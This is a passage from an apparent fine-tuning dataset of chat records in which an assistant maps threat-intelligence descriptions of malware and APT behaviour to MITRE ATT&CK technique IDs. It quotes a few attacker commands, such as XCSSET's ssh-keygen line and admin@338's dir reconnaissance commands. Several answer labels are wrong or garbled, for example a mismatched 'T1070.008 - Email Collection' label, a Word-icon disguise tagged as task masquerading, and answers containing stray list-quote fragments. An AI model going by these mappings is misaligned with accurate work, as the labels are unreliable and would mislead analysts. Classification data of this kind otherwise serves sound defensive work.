- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Cloud Atlas implants utilize a rather unusual C&C mechanism. All the malware samples we’ve seen communicate via HTTPS and WebDav with the same server “cloudme.com”, a cloud services provider. According to their website, CloudMe is owned and operated by CloudMe AB, a company based in Linköping, Sweden"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy has used `cmd` to execute commands on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Suckfly used a signed credential-dumping tool to obtain victim account credentials."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Each time a new drive is inserted, generates a list of all files on the drive and stores it in an encrypted file."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has cleared logs during post compromise cleanup activities."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kasidet has the ability to initiate keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has lured victims into clicking malicious links."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear can leverage API functions for execution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Delivery document The delivery document contains a macro that downloads an executable from a remote server"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to communicate with its C2 over DNS."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NDiskMonitor can download and execute a file from given URL."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can exfiltrate files from the victim using the \"download\" command."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shortly after this RTF document is opened, the remaining stages of the Inception malware are found executing on the system. The loader DLL is responsible for decrypting and injecting the core payload DLL into memory, from an encrypted file present on disk. The core payload DLL's main function is to gather system information, execute other malware in the form of plugins, and update itself"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the library is called by one of the triggering events implemented in its code, it reads a configuration file from a shared Google Document. If it is not able to connect to the address, it uses a hardcoded one"
- },
- {
- "role": "assistant",
- "content": "T1565.002 - Transmitted Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has the capability to exfiltrate stolen data to a hidden folder on a removable drive."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MCMD can use scheduled tasks for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda uses HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike's Beacon payload is capable of capturing screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can communicate to its C2 over TCP using a custom binary protocol."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The latter does not use libcurl anymore and now uses winhttp to perform all requests to C2. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The C2 path pattern has also changed, we have identified the following paths: ini.php, info.php and parse_ini_file.php, which are no longer random nor animal named based"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMail can exfiltrate files from the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used environment variables and standard input (stdin) to obfuscate command-line arguments. FIN8 also obfuscates malicious macros delivered as payloads."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AdFind can enumerate domain groups."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MechaFlounder has the ability to use base16 encoded strings in C2."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 removed evidence of email export requests using \"Remove-MailboxExportRequest\"."
- },
- {
- "role": "assistant",
- "content": "T1070.008 - Email Collection: Mailbox Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (“.sct” file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET will create an ssh key if necessary with the \"ssh-keygen -t rsa -f $HOME/.ssh/id_rsa -P\" command. XCSSET will upload a private key file to the server to remotely access the host without a password."
- },
- {
- "role": "assistant",
- "content": "T1098.004 - SSH Authorized Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Qualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin. This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper contains modules that will use schtasks to carry out malicious operations."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has relied on victims to open malicious links in e-mails for execution."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch has conducted C2 communications with a Dropbox account using the HTTP API."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JHUHUGIT has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "T9000 gathers and beacons the MAC and IP addresses during installation."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot has relied on victims' opening a malicious file for initial execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 has functionality to copy itself to network shares."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has encrypted strings with single-byte XOR and base64 encoded RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has been delivered via malicious links in phishing e-mails."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, the shellcode iterates through the PEB’s loader module list looking for the base address of Kernel32.dll. This is typical of shellcode, as the Kernel32.dll base address is necessary to resolve any dependency files required by the shellcode to run. With this address, the shellcode loads its dependency modules and resolves any necessary Windows Application Programming Interface (API) calls using standard shellcode API hashing. The following modules are loaded"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UserInstall.exe will abuse the BITSadmin command-line tool to create a job and launch sidebar.exe"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a built-in keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin has a command named \"$screenshot\" that may be responsible for taking screenshots of the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "enables remote interaction and can obtain additional code over HTTPS GET and POST requests."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has added the registry value ntdll to the Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used spearphishing to compromise credentials."
- },
- {
- "role": "assistant",
- "content": "T1598 - Phishing for Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit contains a collection of ScriptModification modules that compress and encode scripts and payloads."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The sample arrives as an app bundled in a Zip archive. It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke uses Windows services typically named \"javamtsup\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD has been executed via malicious links in e-mails."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LaZagne can obtain credentials from macOS Keychains."
- },
- {
- "role": "assistant",
- "content": "T1555.001 - Credentials from Password Stores: Keychain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete produces file listings in order to search for files to be exfiltrated."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates various subdirectories under %Temp%\\reports\\% and copies files to those subdirectories. It also creates a folder at C:\\Users\\\\AppData\\Roaming\\Microsoft\\store to store screenshot JPEG files."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is a guest post by independent security researcher James Quinn. This will be Part 1 of a series titled Reversing Gh0stRAT Variants. As 2018 drew to a close and 2019 took over, I began to see a different behavior from SMB malware authors. Instead of massive, multi-staged cryptocurrency miners, I began to see more small, covert RATs serving as partial stage1’s. Of these samples, there was one specific sample that stood out to me. A Gh0stRAT variant, this sample not only changed the Gh0stRAT header from “Gh0st” to “nbLGX”, it also hid its traffic with an encryption algorithm over the entire TCP segment, in addition to the standard Zlib compression on the Gh0stRAT data. Some key functionality is below: Can download more malware Offline Keylogger Cleans Event logs"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has performed credential dumping with LaZagne."
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most of the fake lures for this campaign are related to games, subtitle files, adult videos, and cracked MS Office applications. These are hosted in ZIP format on legitimate file hosting services."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of recording keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, HyperStack uses a custom handshake that is similar to handshakes used for Carbon named-pipe communications. To detect incoming connections from the controller, the HyperStack implant uses the Windows API call ‘ConnectNamedPipe’. When HyperStack receives an incoming connection, it starts a new thread and continues with the custom handshake. If it matches, the HyperStack implant returns the value CACA05ACCE55F11E to the controller"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can monitor services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can list local and remote shared drives and folders over SMB."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can set and delete Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Havij is used to automate SQL injection."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FrameworkPOS can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\\Windows\\."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has copied tools between compromised hosts using SMB."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We believe the adversary exploited a recently vulnerability in Microsoft SharePoint tracked by , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser has established persistence by setting the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key value for \"wdm\" to the path of the executable. It has also used the Registry entry \"HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run vpdn “%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe”\" to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can browse file systems."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT has a plugin for credential harvesting."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has dumped credentials, including by using gsecdump."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about files and directories: \"dir c:\\ >> %temp%\\download\" \"dir \"c:\\Documents and Settings\" >> %temp%\\download\" \"dir \"c:\\Program Files\\\" >> %temp%\\download\" \"dir d:\\ >> %temp%\\download\""
- },
- {
- "role": "assistant",
